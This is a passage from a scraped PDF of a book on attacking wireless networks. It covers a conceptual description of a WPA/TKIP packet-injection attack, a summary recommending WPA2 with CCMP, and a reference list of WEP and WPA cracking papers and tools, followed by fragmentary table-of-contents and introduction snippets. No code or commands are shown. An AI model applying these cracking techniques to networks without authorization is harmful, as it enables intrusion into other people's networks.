Overall, the essence of the attack is combining two packets in such a way
that an unknown MIC value remains valid for the resultant packet.
Since at present no specific implementations of these exploits have

been designed, we will not discuss them in detail.
For more comprehensive information on how to use

the algorithm, see Beck’s original paper at this link:
http://download.aircrack-ng.org/wiki-files/doc/enhanced _ tkip _
michael.pdf
Summary
TKIP attacks are still under development, and become more refined
with each passing month. Unfortunately, overcoming one set of
restrictions only leads to adopting even more stringent limitations.
According to the attack’s author, a successful injection of several
hundred data bytes is only possible if a targeted network includes
a Linux-based device and a victim client has open TCP ports.
There is no bulletproof antidote to attacks against WPA with TKIP.

To feel as safe as possible in a wireless network, you should migrate
to better encryption mechanisms, for example select WPA2 with
CCMP, which is a protocol based on AES.
8
Chapter 8
Summary
The guide has examined the main points of 802.11 and its
successor protocols. You can now name the interrupters in popular
WLANs, and have learned the measures preventing intrusions
and encryption algorithms used in Wi-Fi networks. You also
should be more fully aware of the perils facing wireless users and
administrators, and can quickly break into WEP networks in
a variety of ways. We have also shown you several WPA exploits
which are not effective yet.
The conclusion seems obvious: WPA encryption is preferred over

WEP even if in theory it also can be cracked. At this time, WPA2
with user authentication certificates offers the highest level of
protection. WPA2 Enterprise is designed for large organizations,
providing them with tight security and high chances of discovering
intrusions. All successful and failed logon attempts are saved
to system logs. With appropriate settings configured, it is easy to
determine which host has been hacked and withdraw its certificate
178 Chapter 8 – Summary
to block access to the network for it. This solution is highly

recommended, both for home and enterprise usage. Remember that
the priority should always be network security.
9
Chapter 9
References
1. Scott Fluhrer, Itsik Mantin, Adi Shamir, Weakness in the Key

Scheduling Algorithm of RC4, http://saluc.engr.uconn.edu/
refs/stream _ cipher/fluhrer01weaknessRC4.pdf
2. Adam Stubblefield, John Ioannidis, Aviel D.Rubin, Using

the Fluhrer, Mantin, and Shamir Attack to Break WEP,
http://wiki-files.aircrack-ng.org/doc/using_FMS_attack.pdf
3. David Hulton (h1kari), Practical Exploitation of RC4

Weaknesses in WEP Environments, http://www0.cs.ucl.ac.uk/
staff/a.bittau/sorwep.txt
4. Andrea Bittau, Mark Handley, Joshua Lackey, The Final Nail in

WEP’s Coffin, http://darkircop.org/bittau-wep.pdf
5. Break WEP Faster with Statistical Analysis, Rafik Chaabouni,

http://lasecwww.epfl.ch/abstracts/abstract_wep.shtml
180 Chapter 9 – References
6. Attacks on the WEP protocol, Erik Tews, http://eprint.iacr.

org/2007/471
7. Breaking 104 bit WEP in less than 60 seconds, Erik Tews,

Ralf-Philipp Weinmann, and Andrei Pyshkin, http://eprint.
iacr.org/2007/120.pdf
8. Cafe Latte with a Free Topping of Cracked WEP – Retrieving

WEP Keys From Road-Warriors, Vivek Ramachandran, Md
Sohail Ahmad, http://www.airtightnetworks.com/fileadmin/
ppt/Toorcon.ppt
9. Weakness in the Temporal Key Hash of WPA, Vebjørn

Moen, Håvard Raddum, Kjell J. Hole, https://bora.uib.no/
bitstream/1956/1901/21/Paper_4_Moen.pdf
10. http://www.aircrack-ng.org/
11. http://dl.aircrack-ng.org/breakingwepandwpa.pdf
12. http://packetstormsecurity.com/files/80654/A-Practical-
Message-Falsification-Attack-On-WPA.html
13. http://download.aircrack-ng.org/wiki-files/doc/enhanced _
tkip _ michael.pdf
Notes
Notes
Notes
Notes
Notes
Notes
Notes
Notes

PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

PDF

Uploaded by

Copyright:

Available Formats

HACKING SCHOOL

Attacks on wireless networks.

Copyright © by CSH Press.

Authors of the chapters herein: Mariusz Gliwinski (chapters 1–5),

All rights reserved. This publication is protected by copyright. No part

Company or product names mentioned herein are the trademarks or

For newest info on the Hacking School project, please visit

Chapter 1. Introduction to wireless networks . . . . . . . . . . . . . . . . . 19

Chapter 2. Wireless security (half) measures:

Chapter 3. Wireless network attacks independent

Chapter 4. WEP attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47

Chapter 5. WPA attacks . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . 81

Chapter 6. CUDA-powered attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99

Appendix A: CUDA-powered cracking of MD4/MD5 hashes ...... 146

Chapter 7. Advanced attacks against WPA . . . . . . . . . . . . . . . . . . . . 159

Chapter 8. Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177

Chapter 9. References . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . 179

This book and the software fragments included present techniques

(B) intentionally accesses a protected computer without authorization,

(b) Whoever conspires to commit or attempts to commit an offense under

this section, or an attempt to commit an offense punishable under this

(C) except as provided in subparagraphs (E) and (F), a fine under this

unauthorized disclosure for reasons of national defense or foreign

(e) As used in this section—

(f) This section does not prohibit any lawfully authorized investigative,

(g) Any person who suffers damage or loss by reason of a violation

order, in addition to any other sentence imposed and irrespective of any

(j) For purposes of subsection (i), the following shall be subject

While being an administrator and using the tools described in the

– You have to be really careful during the testing, any third

– All tests should have a complete documentation: the test, its

– Tests conducted for any third person should be carried out

– Only testing environment should be used to conduct

capture your confidential files and passwords as well. Moreover,

This book provides a short primer into the theory of wireless

– basic knowledge of cryptography

– the ABC’s of wireless networks

Wireless transmission standards

802.11 is the general standard for transmitting data over radio.

802.11 evolved into the 802.11a standard with the frequency

its boosted transfer speed (up to 54Mbps). It also offered a relative

Figure 1: Data rates

802.11g is the successor to 802.11b and is backward compatible

The last and latest 802.11 standard enhancement is 802.11n.

The simultaneous use of multiple channels works to uphold the high

besides files and data used by application (goodput), throughput also

The 802.11b networks have 14 channels in the 2.4 GHz range,

802.11 wireless network types

WLANs operate in two modes. The first is Ad Hoc (‘for this’ in

The other mode is Managed (or Infrastructure). At its core is one

The figure below depicts a topology example for clients in range of

Figure 2: WLAN signal transmission

Encryption and authentication

WEP (Wired Equivalent Privacy) has been used as far back as

In Shared Key Authentication the client is required to know

The 802.11i standard was created as a response to WEP’s numerous

of the standard, which enhances and updates the encryption model

In accordance with its specifications, WPA may use 802.1X.

An optional cipher in the standard is WRAP, also a variant of AES.

Below is a table comparing encryption protocols, authentication

Standard Authentication Encryption

Wireless network interface cards

The output is a list of interfaces with associated devices. An example: